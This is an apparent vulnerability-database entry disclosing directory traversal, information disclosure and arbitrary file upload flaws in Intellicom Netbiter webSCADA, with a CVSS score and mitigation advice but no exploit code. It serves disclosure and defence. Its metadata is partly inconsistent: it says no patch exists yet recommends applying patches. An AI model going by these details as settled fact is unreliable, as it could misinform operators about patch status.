vendor:
Netbiter webSCADA
by:
Unknown
7.5
CVSS
HIGH
Directory Traversal, Information Disclosure, Arbitrary File Upload
22
CWE
Product Name: Netbiter webSCADA
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:intellicom:netbiter_webscada
Platforms Tested:
2020
Multiple Vulnerabilities in Intellicom Netbiter webSCADA
The Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks.
Mitigation:
It is recommended to update to the latest version of Netbiter webSCADA or apply the necessary patches. Restricting access to the affected URLs and implementing proper access controls can also help mitigate these vulnerabilities.
